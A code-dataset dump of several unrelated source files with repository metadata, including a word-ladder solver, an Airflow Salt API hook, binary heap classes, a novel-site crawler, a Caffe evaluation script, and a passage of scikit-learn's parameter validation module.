        if not setWords:
            return []
        else:
            neighbors = getClosestNeighbors( start, setWords )
            if neighbors:
                result = [start]
                temp = {}
                for neighbor in neighbors:
                    # Recurse with all current neighbors and visited words
                    # removed, preventing cycles.
                    paths = transform( neighbor, end, setWords - neighbors - set(result) )
                    if len( paths ) > 0:
                        temp[neighbor] = paths
                if temp:
                    min_node_len = min( [ len(v) for v in temp.values() ] )
                    for k,v in temp.items():
                        if len(v) == min_node_len:
                            result = result + v
                    return result
                return []
            else:
                return []
if __name__ == '__main__':
    # Inline smoke tests for the word-ladder helpers.
    assert( calcDistance( 'cat', 'cat') == 0 )
    assert( calcDistance( 'cat', 'cot') == 1 )
    assert( calcDistance( 'gat', 'cot') == 2 )
    setWords = set( ['bat', 'cot', 'dog', 'dag', 'dot', 'cat'] )
    assert( getClosestNeighbors( 'cat', setWords ) == set([ 'bat', 'cot']) )
    assert( getClosestNeighbors( 'dog', setWords ) == set([ 'dag', 'dot']) )
    # NOTE(review): these path assertions may depend on set iteration order
    # (hash randomization) when several equally short ladders exist.
    assert( transform( 'cat', 'dog', setWords ) == ['cat', 'cot', 'dot', 'dog'] )
    setWords = set( ['bat', 'cot', 'dit', 'dut', 'deg' ,'dog', 'dag', 'dot', 'cat'] )
    assert( transform( 'cat', 'dog', setWords ) == ['cat', 'cot', 'dot', 'dog'] )
    assert( transform( 'cat', 'dos', setWords ) == [] )
    setWords = set( ['cat', 'bat', 'pat', 'pot', 'cot'] )
    assert( transform( 'cat', 'cot', setWords ) == ['cat', 'cot'] )
    # Fixed: `print "..."` is Python-2-only syntax and made this whole file
    # a SyntaxError under Python 3; the call form works on both.
    print("All unit tests are passed")
|
[
"[email protected]"
] | |
5a2734673ebe2a3d4cd4e803f73fdb80c111d7ce
|
12541a13c92f50b5369ee7f99ed0c1e97a45f035
|
/6/6-2.py
|
53c9d629ea47a4111df785be693c801a7cecdb68
|
[
"BSD-3-Clause"
] |
permissive
|
liuhanyu200/pygame
|
6364d90914c244fa53f56a5616a9bd95b86f440c
|
38a68e779e6b0a63edb1758fca98ebbf40bb0444
|
refs/heads/master
| 2023-06-07T04:32:57.946745 | 2021-07-01T10:17:41 | 2021-07-01T10:17:41 | 375,933,464 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 391 |
py
|
# -*- coding:utf-8 -*-
# Map of person -> favorite number; insertion order drives output order.
favorite_numbers = {
    'wangyue': 8,
    'liuseng': 2,
    'luoliuzhou': 9,
    'liushaoqiang': 1,
    'caohongsheng': 100,
    'xiongmao': 6,
    'xixi': 6,
}

# People we want to thank; everyone else gets the "come again" message.
peoples = ['liushaoqiang', 'xixi', 'wangermazi', 'liguoqiang']

for person in favorite_numbers:
    greeting = "thanks " if person in peoples else "xiacizailai "
    print(greeting + person)
|
[
"[email protected]"
] | |
a605b6bbb3899214e99bd6aac578f9a4ba6ca0c6
|
e0b1cd64903e4e3f2b0820e68f9c4df36800e748
|
/hooks/salt_hook.py
|
32b59c15c01230df25870e4f465bfba821579f0a
|
[
"Apache-2.0"
] |
permissive
|
savvykms/airflow-salt
|
b6f61b65c6091567ee21f2981b70f27a50d3a150
|
079fff2d0cd9090da349d6d95b72dd237810bf65
|
refs/heads/master
| 2021-06-01T06:49:42.996534 | 2016-07-13T15:40:33 | 2016-07-13T15:40:33 | 63,256,845 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,712 |
py
|
# -*- coding: utf-8 -*-
from builtins import str
import logging
import pprint
import json
import requests
from airflow.hooks.base_hook import BaseHook
from airflow.exceptions import AirflowException
class SaltHook(BaseHook):
    """
    Interact with Salt servers

    Wraps the Salt HTTP API (salt-api / CherryPy): authenticates once via
    /login with PAM eauth, caches the token, and posts job payloads.
    """
    def __init__(self, salt_conn_id='salt_default'):
        self.salt_conn_id = salt_conn_id
        # Cached X-Auth-Token; fetched lazily on first use.
        self.authToken = None
    def getAuthedConnection(self):
        """
        Obtains an authenticated connection
        """
        conn = self.get_connection(self.salt_conn_id)
        session = requests.Session()
        # Default salt-api port unless the Airflow connection overrides it.
        port = 8000
        if conn.port:
            port = conn.port
        self.baseUrl = 'https://' + conn.host + ':' + str(port) + '/'
        session.headers.update({ 'Content-Type': 'application/json; charset=UTF-8' })
        if not self.authToken:
            self.getAuthToken(session, conn.login, conn.password)
        session.headers.update({ 'X-Auth-Token': self.authToken })
        return session;
    def getAuthToken( self, session, username, password ):
        """
        Gets auth token from the Salt API
        """
        self.authToken = None
        url = self.baseUrl + 'login'
        data = { 'username': username, 'password': password, 'eauth': 'pam' }
        request = requests.Request('POST', url)
        prepped_request = session.prepare_request(request)
        # Body is serialized manually so Content-Length can be set explicitly.
        prepped_request.body = json.dumps(data)
        prepped_request.headers.update({ 'Content-Length': len(prepped_request.body) });
        # NOTE(review): verify=False disables TLS certificate verification —
        # credentials travel over an unverified channel.
        response = session.send(prepped_request, stream=False, verify=False, allow_redirects=True)
        resp = response.json()
        if 'token' in resp.get('return', [{}])[0]:
            self.authToken = resp['return'][0]['token']
        else:
            raise AirflowException( 'Could not authenticate properly: ' + str(response.status_code) + ' ' + response.reason )
        try:
            response.raise_for_status()
        except requests.exceptions.HTTPError:
            raise AirflowException( 'Could not authenticate properly: ' + str(response.status_code) + ' ' + response.reason )
        return self.authToken
    def run( self, client='local', tgt=None, fun=None, fun_args=None ):
        """
        Calls the API

        Posts a single job: client type, target expression, function and
        its arguments. Returns the raw requests.Response.
        NOTE(review): the payload key is 'args'; confirm the target salt-api
        version accepts it (some releases expect 'arg').
        """
        session = self.getAuthedConnection()
        url = self.baseUrl
        data = { 'client': client, 'tgt': tgt, 'fun': fun, 'args': fun_args }
        try:
            request = requests.Request('POST', url)
            prepped_request = session.prepare_request(request)
            prepped_request.body = json.dumps(data)
            prepped_request.headers.update({ 'Content-Length': len(prepped_request.body) });
            response = session.send(prepped_request, stream=False, verify=False, allow_redirects=True)
            response.raise_for_status()
        except requests.exceptions.HTTPError:
            # HTTP errors are logged but the response is still returned.
            logging.error( 'HTTP error: ' + response.reason )
        logging.info( 'DEBUG: ' + pprint.pformat( response.__dict__ ) )
        return response
|
[
"[email protected]"
] | |
1134b638f80602379677b927db8cbe49ee857fde
|
2e85be29ff69c821aafd0ed054af40fbfeccea8d
|
/CrackingTheCodingInterview/TreesandGraphs/BinaryHeap.py
|
1a7a42cac1df9a4eadf7cf1ebe586c1b7f44e646
|
[] |
no_license
|
maheshbabugorantla/CodingInterview
|
6890fe5e5b4f284b9f079b9ed6d918eb446347df
|
c24d5b35a452817fa3a5bb2dcc1168ce7fe47460
|
refs/heads/master
| 2020-03-14T03:39:11.590413 | 2018-05-03T00:32:06 | 2018-05-03T00:32:06 | 131,424,522 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,887 |
py
|
class MaxHeap:
    """Array-backed binary max-heap.

    The backing list is 1-indexed (slot 0 is a placeholder), so the children
    of node ``i`` live at ``2 * i`` and ``2 * i + 1``.  All stored keys must
    be instances of the type passed at construction time.
    """

    def __init__(self, dtype=None):
        if dtype is None:
            raise ValueError("'type' cannot be None")
        if not isinstance(dtype, type):
            raise TypeError("'dtype' should be of type <class 'type'>")
        self._type = dtype
        self._heap = [None]  # slot 0 is never used
        self._size = 0

    def getSize(self):
        """Return the number of keys currently stored."""
        return self._size

    def _getMaxChild(self, parent):
        """Return the index of the larger child of ``parent``.

        Falls back to the left child when the right child does not exist.
        """
        left = parent * 2
        right = left + 1
        if right > self._size or self._heap[left] > self._heap[right]:
            return left
        return right

    def _percDown(self, idx):
        """Sift the key at ``idx`` down until the heap property holds."""
        while idx * 2 <= self._size:
            child = self._getMaxChild(idx)
            if self._heap[child] > self._heap[idx]:
                self._heap[idx], self._heap[child] = (
                    self._heap[child],
                    self._heap[idx],
                )
            idx = child

    def delMaxKey(self):
        """Remove and return the largest key, or ``None`` if the heap is empty."""
        if not self._size:
            return None
        top = self._heap[1]
        # Move the last leaf to the root, shrink, then restore the invariant.
        self._heap[1] = self._heap[self._size]
        self._size = self._size - 1
        self._heap.pop()
        self._percDown(1)
        return top

    def _percUp(self, idx):
        """Sift the key at ``idx`` up toward the root while it dominates its parent."""
        while idx // 2 > 0:
            parent = idx // 2
            if self._heap[idx] > self._heap[parent]:
                self._heap[idx], self._heap[parent] = (
                    self._heap[parent],
                    self._heap[idx],
                )
            idx = parent

    def insert(self, key):
        """Add ``key`` to the heap and return ``self`` so calls can be chained."""
        if not isinstance(key, self._type):
            raise TypeError("'key' should be of type {}".format(self._type))
        self._heap.append(key)
        self._size += 1
        self._percUp(self._size)
        return self

    # Returns the Key with Maximum Value
    def getMaxKey(self):
        """Return the largest key without removing it (IndexError when empty)."""
        return self._heap[1]

    # Creates heap from List of keys
    def createHeapFromList(self, keys=None):
        """Replace the heap contents with ``keys`` and heapify bottom-up in O(n)."""
        assert isinstance(keys, list), "'keys' is of type {}, should be of type {}".format(type(keys), list)
        # Checking if all items in 'keys' list are of type self._type
        assert all(isinstance(key, self._type) for key in keys), "All items in 'keys' should be of type {}".format(self._type)
        self._size = len(keys)
        self._heap = [0] + keys[:]
        for node in range(self._size // 2, 0, -1):
            self._percDown(node)
class MinHeap:
    """Array-backed binary min-heap.

    The backing list is 1-indexed (slot 0 is a placeholder), so the children
    of node ``i`` live at ``2 * i`` and ``2 * i + 1``.  All stored keys must
    be instances of the type passed at construction time.
    """

    def __init__(self, dtype=None):
        if dtype is None:
            raise ValueError("'type' cannot be None")
        if not isinstance(dtype, type):
            raise TypeError("'dtype' should be of type <class 'type'>")
        self._type = dtype
        self._heap = [None]  # slot 0 is never used
        self._size = 0

    def getSize(self):
        """Return the number of keys currently stored."""
        return self._size

    def insert(self, key):
        """Add ``key`` to the heap and return ``self`` so calls can be chained."""
        if not isinstance(key, self._type):
            # Fixed message wording ("should of be" -> "should be") and made
            # it consistent with MaxHeap.insert.
            raise TypeError("'key' should be of type {}".format(self._type))
        self._size += 1
        self._heap.append(key)
        self._percUp(self._size)
        return self

    def _percUp(self, i):
        """Sift the key at ``i`` up toward the root while it undercuts its parent."""
        while i // 2 > 0:
            if self._heap[i] < self._heap[i // 2]:
                tmp = self._heap[i // 2]
                self._heap[i // 2] = self._heap[i]
                self._heap[i] = tmp
            i = i // 2

    # Returns the key with minimum value
    def getMinKey(self):
        """Return the smallest key without removing it (IndexError when empty)."""
        return self._heap[1]

    def _percDown(self, i):
        """Sift the key at ``i`` down until the heap property holds below it."""
        while (i * 2) <= self._size:
            minChild = self._getMinChild(i)
            if self._heap[minChild] < self._heap[i]:
                temp = self._heap[minChild]
                self._heap[minChild] = self._heap[i]
                self._heap[i] = temp
            i = minChild

    # Returns the Index of the Min Child
    def _getMinChild(self, i):
        """Return the index of the smaller child of ``i`` (left if no right child)."""
        if (i * 2 + 1) > self._size:
            return i * 2
        else:
            if self._heap[i * 2] < self._heap[i * 2 + 1]:
                return i * 2
            else:
                return i * 2 + 1

    # Deletes the Min Key and returns the minimum key
    def delMinKey(self):
        """Remove and return the smallest key, or ``None`` if the heap is empty."""
        if self._size:
            minVal = self._heap[1]
            # Move the last leaf to the root, shrink, then restore the invariant.
            self._heap[1] = self._heap[self._size]
            self._size = self._size - 1
            self._heap.pop()
            self._percDown(1)
            return minVal
        return None

    # Creates a new heap from the list of keys
    def createHeapFromList(self, keys=None):
        """Replace the heap contents with ``keys`` and heapify bottom-up in O(n)."""
        assert isinstance(keys, list), "'keys' is of type {}, should be of type {}".format(type(keys), list)
        # Checking if all items in 'keys' list are of type self._type
        assert all(isinstance(key, self._type) for key in keys), "All items in 'keys' should be of type {}".format(self._type)
        self._size = len(keys)
        self._heap = [0] + keys[:]
        count = self._size // 2
        while count > 0:
            self._percDown(count)
            count -= 1
|
[
"[email protected]"
] | |
0bc96e095f2069bc9811ef311b2dee119285ae92
|
9c88b828b783e23b50186a2cbba2c08610d8d10d
|
/espressodb/documentation/__init__.py
|
c16020e168c1d82085be018508a3cd3600a84a63
|
[
"BSD-3-Clause"
] |
permissive
|
remram44/espressodb
|
9a51219c0e7ec6e4c400578d02b97ef95024ba1e
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
refs/heads/master
| 2020-12-08T06:07:43.736419 | 2020-01-12T20:31:20 | 2020-01-12T20:31:20 | 232,909,755 | 0 | 0 |
BSD-3-Clause
| 2020-01-09T21:29:09 | 2020-01-09T21:29:08 | null |
UTF-8
|
Python
| false | false | 170 |
py
|
"""The documentations module provides a web page which summarizes the implemented models
which derive from the EspressoDB :class:`espressodb.base.models.Base` class.
"""
|
[
"[email protected]"
] | |
5865cee0434fa771b0ffd1e3c9bcb56df6e08c4a
|
3967e42abb6f497ede6d342e8f74bd8150f9c52d
|
/src/spiders/qidiancom.py
|
b70dc6414c2c1f6637e2011d657997aa17ae923f
|
[
"Apache-2.0"
] |
permissive
|
varunprashar5/lightnovel-crawler
|
4886862115c5c3e15a9137e698e14253e14b7423
|
4ca387f3c8f17771befad1d48d417bbc7b9f8bfd
|
refs/heads/master
| 2020-12-01T22:27:33.699798 | 2019-12-29T05:25:09 | 2019-12-29T05:25:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,465 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from ..utils.crawler import Crawler
logger = logging.getLogger('QIDIAN_COM')

# AJAX endpoint returning the volume/chapter tree; formatted with
# (csrf_token, book_id).
chapter_list_url = 'https://book.qidian.com/ajax/book/category?_csrfToken=%s&bookId=%s'
# Chapter reader page; formatted with the chapter slug (`cU` field).
chapter_details_url = 'https://read.qidian.com/chapter/%s'
class QidianComCrawler(Crawler):
    """Crawler for novels hosted on qidian.com.

    Relies on the ``Crawler`` base class for HTTP helpers (``get_soup``,
    ``get_json``, ``absolute_url``, ``cookies``) and for the
    ``novel_*``/``volumes``/``chapters`` attributes it populates.
    """

    def initialize(self):
        # Home URL used by the framework to bootstrap the session/cookies.
        self.home_url = 'https://www.qidian.com/'
    # end def

    def read_novel_info(self):
        '''Get novel title, author, cover, and the full volume/chapter list.'''
        logger.debug('Visiting %s', self.novel_url)
        soup = self.get_soup(self.novel_url)

        self.novel_title = soup.select_one('.book-info h1 em').text
        logger.info('Novel title: %s', self.novel_title)

        self.novel_author = soup.select_one('.book-info h1 a.writer').text
        logger.info('Novel author: %s', self.novel_author)

        book_img = soup.select_one('#bookImg')
        self.novel_cover = self.absolute_url(book_img.find('img')['src'])
        # Drops the last path segment of the cover URL -- presumably a size
        # suffix, leaving the full-resolution image. TODO confirm against the
        # site's current URL scheme.
        self.novel_cover = '/'.join(self.novel_cover.split('/')[:-1])
        logger.info('Novel cover: %s', self.novel_cover)

        # The AJAX chapter-list endpoint needs the book id and a CSRF token
        # that the site sets as a cookie on the first page load.
        self.book_id = book_img['data-bid']
        logger.debug('Book Id: %s', self.book_id)

        self.csrf = self.cookies['_csrfToken']
        logger.debug('CSRF Token: %s', self.csrf)

        volume_url = chapter_list_url % (self.csrf, self.book_id)
        logger.debug('Visiting %s', volume_url)
        data = self.get_json(volume_url)

        # 'vs' = volumes, 'vN' = volume name, 'cs' = chapters,
        # 'cN' = chapter name, 'cU' = chapter URL slug (per the JSON consumed
        # above -- field meanings inferred from usage, verify if it breaks).
        for volume in data['data']['vs']:
            vol_id = len(self.volumes) + 1
            self.volumes.append({
                'id': vol_id,
                'title': volume['vN'],
            })
            for chapter in volume['cs']:
                ch_id = len(self.chapters) + 1
                self.chapters.append({
                    'id': ch_id,
                    'volume': vol_id,
                    'title': chapter['cN'],
                    'url': chapter_details_url % chapter['cU'],
                })
            # end for
        # end for
    # end def

    def download_chapter_body(self, chapter):
        '''Download body of a single chapter and return as clean html format'''
        logger.info('Downloading %s', chapter['url'])
        soup = self.get_soup(chapter['url'])
        # NOTE(review): 'body_lock' looks like a flag consumed by the base
        # class / output stage -- confirm its meaning there.
        chapter['body_lock'] = True
        chapter['title'] = soup.select_one('h3.j_chapterName').text.strip()
        return soup.select_one('div.j_readContent').extract()
    # end def
# end class
|
[
"[email protected]"
] | |
53a370b8267f3b4b44af65a058a1f0d3b8878e36
|
0ae564797425ff1c324904e7292b3ea1ed8f20b6
|
/pycaffe/python2.7.12/check_china_lenet_dp2.py
|
1d20db532f2dcc19c5fb29bde1c43bcd2871d512
|
[] |
no_license
|
f846019u/git
|
69c371db15e5cd2071473c6e165664980ab55b50
|
7ca8d1bc9e46ff045100315eaf3addc75ffce9e8
|
refs/heads/master
| 2020-04-06T22:40:18.734028 | 2018-11-16T09:14:32 | 2018-11-16T09:14:32 | null | 0 | 0 | null | null | null | null |
EUC-JP
|
Python
| false | false | 3,322 |
py
|
#!/usr/bin/env python
# Evaluate a trained "china_lenet_dp2" Caffe model on the banknote character
# test set and print the paths of misclassified images.  (Python 2 script;
# original comments were in Japanese and have been translated.)
import numpy as np
import sys
import os
import caffe
import cv2 as cv

# Index of the evaluation split (selects both the weight file and the
# test-image directory).
VALUE_NUM = '0'
MODEL_NAME = 'china_lenet_dp2'
MODEL_FILE = '../../' + MODEL_NAME + '_deploy.prototxt'
PRETRAINED = '../../weights/' + MODEL_NAME + '/' + MODEL_NAME + '_value' + VALUE_NUM + '_iter_15000.caffemodel'
IMAGE_FILE = '/home/higaki/china_data/image_0/test/alp/A/0202_SN1_3.png'

if not os.path.isfile(MODEL_FILE):
    print("error: caffe model load...")
if not os.path.isfile(PRETRAINED):
    print("error: pre-trained caffe model...")
if not os.path.isfile(IMAGE_FILE):
    print("error: image_file not open.")

print ' '
print MODEL_FILE
print PRETRAINED
print ' '

# Build the test-data label/path lists (the image preprocessing itself is
# disabled below -- images are re-read by caffe.io.load_image later).
# Input geometry and number of classes.
width = 14
height = 20
test_class = 36

# Collect the sub-directories of PATH ('alp', 'num') into dir_list.
PATH = '/home/higaki/china_data/image_' + VALUE_NUM + '/test/'
tmp = os.listdir(PATH)
tmp = sorted([x for x in tmp if os.path.isdir(PATH + x)])
dir_list = tmp
#print(dir_list)

X_test = []
Y_test = []
image_name = []
label = 0

# Process the 'alp' (letters) and 'num' (digits) branches.
for alp_num in dir_list:
    # Digits use labels 0-9; letters start at 10.
    if str(alp_num) == 'num':
        label = 0
    if str(alp_num) == 'alp':
        label = 10
    tmp = os.listdir(PATH + str(alp_num) + '/')
    #print tmp
    tmp = sorted([x for x in tmp if os.path.isdir(PATH + '/' + str(alp_num) + '/' + x)])
    #print tmp
    alp_num_list = tmp
    # Process each class directory (A-Z or 0-9).
    for dir_name in alp_num_list:
        file_list = os.listdir(PATH + str(alp_num) + '/' + str(dir_name))
        #print dir_name
        #print len(file_list)
        # Process every image in this class directory.
        for file_name in file_list:
            if file_name.endswith('.png'):
                #image = cv.imread(PATH + str(alp_num) + '/' + str(dir_name) + '/' + file_name, 0)
                #image = cv.resize(image, (width, height))
                #cv.normalize(image, image, alpha=0, beta=255, norm_type=cv.NORM_MINMAX)
                #image = image / 255.
                #X_test.append(image)
                Y_test.append(label)
                image_name.append(PATH + str(alp_num) + '/' + str(dir_name) + '/' + file_name)
        label = label + 1
        # 'V' does not appear on Chinese banknotes, so skip its label index.
        if label == 31:
            label = label + 1

#print len(Y_test)
#print len(image_name)

X_test = np.asarray(X_test)
Y_test = np.asarray(Y_test)
# NOTE(review): sorting image_name here breaks the pairing with Y_test that
# was built in lockstep above -- confirm the labels still line up (directory
# listing order is not guaranteed to be sorted).
image_name.sort()
#print(X_test.shape)
#print(Y_test.shape)
#print(len(image_name))

# Check which test images the network misclassifies.
caffe.set_mode_cpu()
net = caffe.Classifier(MODEL_FILE, PRETRAINED, image_dims=(20, 14))

for (Y, name) in zip(Y_test, image_name):
    # Remap look-alike letters to digits: label 18 ('I') -> 1, 24 ('O') -> 0.
    if Y == 18:
        Y = 1
    if Y == 24:
        Y = 0
    input_image = caffe.io.load_image(name, color=False)
    prediction = net.predict([input_image], False)
    #print("prediction shape: {}".format(prediction[0].shape))
    #print("predicted class: {}".format(prediction[0].argmax()) + ' ' + str(Y))
    if str(Y) != format(prediction[0].argmax()):
        print name + ' ' + format(prediction[0].argmax())
        #print("predicted class: {}".format(prediction[0].argmax()) + ' ' + str(Y))
|
[
"[email protected]"
] | |
81d8d57b0e12ee8119dcc4e5f8a7af1fbd776d8e
|
f92a578eb638f8310e1824ebfc32d6c252f6043c
|
/game/omok/OmokClient.py
|
347993c7f964bfcdf40d795fdd42bc1e05865864
|
[
"MIT"
] |
permissive
|
HyOsori/battle.ai
|
6e847bf4594e9fd49543cbb29325d4ba0bc02e78
|
5e459fc965716cb336b3b4aa3ea02c9bfe529621
|
refs/heads/develop
| 2020-04-12T06:43:44.568719 | 2017-09-10T06:42:09 | 2017-09-10T06:42:09 | 64,668,694 | 23 | 3 | null | 2017-09-10T06:42:11 | 2016-08-01T13:20:55 |
JavaScript
|
UTF-8
|
Python
| false | false | 382 |
py
|
# -*-coding:utf-8-*-
# Entry point for an Omok (five-in-a-row) game client: connects to the game
# server, installs the player's parser, and runs the client loop.
import sys

from game.omok.MyOmokParser import MyOMOKParser
from gamebase.client.Client import Client

# HOST = '104.199.218.103'  # remote game server (disabled)
HOST = '127.0.0.1'
PORT = 9001

client = Client()
if client.connect_server(HOST, PORT) is False:
    print('서버 연결오류')  # "server connection error"
    sys.exit()

player_parser = MyOMOKParser()
client.set_parser(player_parser)
client.client_run()  # blocks, driving the game session
|
[
"[email protected]"
] | |
f636068a81116528616e1f63c07c412447c94e49
|
c5be6a92f216957d340474b58507606a38c10f5f
|
/course-files/tutorials/tutorial04/answers/drawings/d5.py
|
e0e46a2f538962b9b15a80780794e0fa647bfa31
|
[] |
no_license
|
eecs110/winter2019
|
0b314c35e886b8099368ed7dfd51b707ab73c0c2
|
f4107207ca1c9c10b78bdbb74fd82410b00ee363
|
refs/heads/master
| 2020-04-11T10:09:28.100445 | 2019-03-21T18:00:25 | 2019-03-21T18:00:25 | 161,705,160 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 860 |
py
|
from tkinter import Canvas, Tk
import random
import shapes
import math

gui = Tk()
gui.title('Circle')

canvas = Canvas(gui, width=500, height=500, background='#FFFFFF')
canvas.pack()

########################## YOUR CODE BELOW THIS LINE ##############################

# Draw num_circles circles whose centers are evenly spaced around a ring of
# radius distance_from_center, centered at (center_x, center_y).
center_x = 250
center_y = 250
distance_from_center = 50
radius_of_individual_circle = 100
num_circles = 30

for i in range(num_circles):
    # calculate new position of x and y: angle of the i-th center in radians
    # (360/num_circles degrees apart, converted via pi/180).
    radians = 360 / num_circles * i * (math.pi / 180)
    dy = distance_from_center * math.sin(radians)
    dx = distance_from_center * math.cos(radians)
    x = center_x + dx
    # Subtract dy because the canvas y-axis grows downward.
    y = center_y - dy
    shapes.make_circle(canvas, (x, y), radius_of_individual_circle, color=None, outline='black', stroke_width=1)

########################## YOUR CODE ABOVE THIS LINE ##############################
canvas.mainloop()
|
[
"[email protected]"
] | |
b41096d3e1efdc61b647a58e277d2f249fd7989c
|
3a957b12c171cb81f2a0458d5c5b186679535dad
|
/sklearn/utils/_param_validation.py
|
4370817094be87a9f7f5ff2ce45aaf23fe527990
|
[
"BSD-3-Clause"
] |
permissive
|
jeremiedbb/scikit-learn
|
d6e72dc13c44e2e5e2060d74d71cd300c53f3240
|
c3bfe86b45577a9405a4680d9971efa9594a0657
|
refs/heads/master
| 2023-07-09T19:03:28.306963 | 2023-03-30T17:30:41 | 2023-03-30T17:30:41 | 135,716,742 | 3 | 0 |
BSD-3-Clause
| 2023-03-16T21:18:33 | 2018-06-01T12:46:27 |
Python
|
UTF-8
|
Python
| false | false | 27,087 |
py
|
from abc import ABC
from abc import abstractmethod
from collections.abc import Iterable
import functools
import math
from inspect import signature
from numbers import Integral
from numbers import Real
import operator
import re
import warnings
import numpy as np
from scipy.sparse import issparse
from scipy.sparse import csr_matrix
from .validation import _is_arraylike_not_scalar
class InvalidParameterError(ValueError, TypeError):
    """Custom exception to be raised when the parameter of a class/method/function
    does not have a valid type or value.
    """

    # Inherits from ValueError and TypeError to keep backward compatibility.
def validate_parameter_constraints(parameter_constraints, params, caller_name):
    """Check every parameter in `params` against its declared constraints.

    Parameters
    ----------
    parameter_constraints : dict or {"no_validation"}
        If "no_validation", validation is skipped for this parameter.

        If a dict, it must be a dictionary `param_name: list of constraints`.
        A parameter is valid if it satisfies one of the constraints from the
        list.  Accepted constraint forms are the ones understood by
        `make_constraint`: an Interval, the strings "array-like",
        "sparse matrix", "random_state", "boolean", "verbose", "cv_object",
        "missing_values", a callable, None, a type, an Options/StrOptions
        instance, a HasMethods instance, or a Hidden wrapper.

    params : dict
        A dictionary `param_name: param_value` with the values to validate.

    caller_name : str
        Name of the estimator, function or method on whose behalf the
        validation is performed (used in the error message).
    """
    for param_name, param_val in params.items():
        # Parameters without a declared constraint are skipped, so third
        # party estimators can inherit from sklearn estimators without
        # having to use the validation tools.
        if param_name not in parameter_constraints:
            continue

        declared = parameter_constraints[param_name]

        if declared == "no_validation":
            continue

        constraints = [make_constraint(constraint) for constraint in declared]

        # Valid as soon as any single constraint accepts the value.
        if any(constraint.is_satisfied_by(param_val) for constraint in constraints):
            continue

        # No constraint is satisfied: build an informative message, omitting
        # constraints marked hidden (internal / not officially supported).
        visible = [constraint for constraint in constraints if not constraint.hidden]

        if len(visible) == 1:
            constraints_str = f"{visible[0]}"
        else:
            constraints_str = (
                f"{', '.join([str(c) for c in visible[:-1]])} or"
                f" {visible[-1]}"
            )

        raise InvalidParameterError(
            f"The {param_name!r} parameter of {caller_name} must be"
            f" {constraints_str}. Got {param_val!r} instead."
        )
def make_constraint(constraint):
    """Convert a declared constraint into the matching Constraint object.

    Parameters
    ----------
    constraint : object
        The constraint to convert (string alias, type, callable, None,
        an already-built constraint instance, or a Hidden wrapper).

    Returns
    -------
    constraint : instance of _Constraint
        The converted constraint.
    """
    # String aliases map one-to-one onto zero-argument constraint classes.
    string_aliases = {
        "array-like": _ArrayLikes,
        "sparse matrix": _SparseMatrices,
        "random_state": _RandomStates,
        "boolean": _Booleans,
        "verbose": _VerboseHelper,
        "missing_values": _MissingValues,
        "cv_object": _CVObjects,
    }
    if isinstance(constraint, str) and constraint in string_aliases:
        return string_aliases[constraint]()
    if constraint is callable:
        return _Callables()
    if constraint is None:
        return _NoneConstraint()
    if isinstance(constraint, type):
        return _InstancesOf(constraint)
    if isinstance(constraint, (Interval, StrOptions, Options, HasMethods)):
        # Already a constraint instance: pass through unchanged.
        return constraint
    if isinstance(constraint, Hidden):
        # Unwrap, convert, and flag so error messages omit it.
        wrapped = make_constraint(constraint.constraint)
        wrapped.hidden = True
        return wrapped
    raise ValueError(f"Unknown constraint type: {constraint}")
def validate_params(parameter_constraints):
    """Decorator to validate types and values of functions and methods.

    Parameters
    ----------
    parameter_constraints : dict
        A dictionary `param_name: list of constraints`. See the docstring of
        `validate_parameter_constraints` for a description of the accepted
        constraints.

        Note that the *args and **kwargs parameters are not validated and must not
        be present in the parameter_constraints dictionary.

    Returns
    -------
    decorated_function : function or method
        The decorated function.
    """

    def decorator(func):
        # The dict of parameter constraints is set as an attribute of the function
        # to make it possible to dynamically introspect the constraints for
        # automatic testing.
        setattr(func, "_skl_parameter_constraints", parameter_constraints)

        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # NOTE: the signature is recomputed on every call.
            func_sig = signature(func)

            # Map *args/**kwargs to the function signature
            params = func_sig.bind(*args, **kwargs)
            params.apply_defaults()

            # ignore self/cls and positional/keyword markers
            to_ignore = [
                p.name
                for p in func_sig.parameters.values()
                if p.kind in (p.VAR_POSITIONAL, p.VAR_KEYWORD)
            ]
            to_ignore += ["self", "cls"]
            params = {k: v for k, v in params.arguments.items() if k not in to_ignore}

            validate_parameter_constraints(
                parameter_constraints, params, caller_name=func.__qualname__
            )

            try:
                return func(*args, **kwargs)
            except InvalidParameterError as e:
                # When the function is just a wrapper around an estimator, we allow
                # the function to delegate validation to the estimator, but we replace
                # the name of the estimator by the name of the function in the error
                # message to avoid confusion.
                msg = re.sub(
                    r"parameter of \w+ must be",
                    f"parameter of {func.__qualname__} must be",
                    str(e),
                )
                raise InvalidParameterError(msg) from e

        return wrapper

    return decorator
class RealNotInt(Real):
    """A type that represents reals that are not instances of int.

    Behaves like float, but also works with values extracted from numpy arrays.
    isintance(1, RealNotInt) -> False
    isinstance(1.0, RealNotInt) -> True
    """


# Register float as a virtual subclass so isinstance(1.0, RealNotInt) is True
# while plain ints (not registered) are rejected.
RealNotInt.register(float)
def _type_name(t):
"""Convert type into human readable string."""
module = t.__module__
qualname = t.__qualname__
if module == "builtins":
return qualname
elif t == Real:
return "float"
elif t == Integral:
return "int"
return f"{module}.{qualname}"
class _Constraint(ABC):
    """Base class for the constraint objects."""

    def __init__(self):
        # When True, this constraint is enforced but omitted from the error
        # message built by validate_parameter_constraints.
        self.hidden = False

    @abstractmethod
    def is_satisfied_by(self, val):
        """Whether or not a value satisfies the constraint.

        Parameters
        ----------
        val : object
            The value to check.

        Returns
        -------
        is_satisfied : bool
            Whether or not the constraint is satisfied by this value.
        """

    @abstractmethod
    def __str__(self):
        """A human readable representational string of the constraint."""
class _InstancesOf(_Constraint):
    """Constraint satisfied by any instance of a given type.

    Parameters
    ----------
    type : type
        The valid type.
    """

    def __init__(self, type):
        super().__init__()
        self.type = type

    def is_satisfied_by(self, val):
        return isinstance(val, self.type)

    def __str__(self):
        return f"an instance of {_type_name(self.type)!r}"
class _NoneConstraint(_Constraint):
    """Constraint matching only the ``None`` singleton."""

    def is_satisfied_by(self, val):
        # Identity check: only the singleton itself qualifies.
        return val is None

    def __str__(self):
        return "None"
class _NanConstraint(_Constraint):
    """Constraint matching the NaN missing-value indicator."""

    def is_satisfied_by(self, val):
